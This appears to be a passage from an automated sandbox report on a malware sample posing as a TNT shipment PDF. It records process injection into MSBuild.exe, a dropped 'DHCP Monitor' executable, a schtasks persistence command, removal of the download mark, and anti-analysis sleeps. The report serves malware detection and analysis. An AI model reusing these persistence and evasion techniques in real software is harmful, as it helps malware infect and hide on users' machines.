      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE' Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp'Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7609.tmp'Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb%0 source: MSBuild.exe, 00000003.00000003.941644723.0000000001268000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.pdb source: MSBuild.exe, 00000003.00000003.950346541.000000000126D000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.3.dr
      Source: Binary string: wntdll.pdbUGP source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE, 00000001.00000003.652861148.000000001BC10000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE, 00000001.00000003.652861148.000000001BC10000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 00000003.00000003.941644723.0000000001268000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.dr
      Source: Binary string: \??\C:\Windows\System.pdb source: MSBuild.exe, 00000003.00000003.950311338.000000000125D000.00000004.00000001.sdmp
      Source: Binary string: System.pdbU! source: MSBuild.exe, 00000003.00000003.941616893.000000000125D000.00000004.00000001.sdmp
      Source: Binary string: System.pdb source: MSBuild.exe, 00000003.00000003.996753411.0000000006976000.00000004.00000001.sdmp
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5EAF3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A5EAF3
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A554F5 push ecx; ret 1_2_00A55508
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E35578 push FFFFFF8Bh; iretd 12_2_02E3551B
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEFile created: \tnt shipment awb_image ci_from tnt awb# 167095453_pdf_________.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival:

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp'

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3615Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5800Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 488Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1403Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6888Thread sleep time: -15679732462653109s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4612Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 3120Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1172Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: MSBuild.exe, 00000003.00000002.1047891246.00000000070C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: MSBuild.exe, 00000003.00000002.1047891246.00000000070C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: MSBuild.exe, 00000003.00000002.1047891246.00000000070C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: MSBuild.exe, 00000003.00000003.936447868.0000000001230000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: MSBuild.exe, 00000003.00000002.1047891246.00000000070C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5EAF3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A5EAF3
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5EAF3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A5EAF3
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5EAF3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A5EAF3
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A51E50 mov eax, dword ptr fs:[00000030h]1_2_00A51E50
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_008FEAC5 mov eax, dword ptr fs:[00000030h]1_2_008FEAC5
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_008FF3D4 mov eax, dword ptr fs:[00000030h]1_2_008FF3D4
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_008FF334 mov eax, dword ptr fs:[00000030h]1_2_008FF334
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_008FF371 mov eax, dword ptr fs:[00000030h]1_2_008FF371
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_008FF519 mov eax, dword ptr fs:[00000030h]1_2_008FF519
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A51FD0 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,1_2_00A51FD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A54BE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A54BE6
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A54BC3 SetUnhandledExceptionFilter,1_2_00A54BC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      .NET source code references suspicious native API functionsShow sources
      Source: dhcpmon.exe.3.dr, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
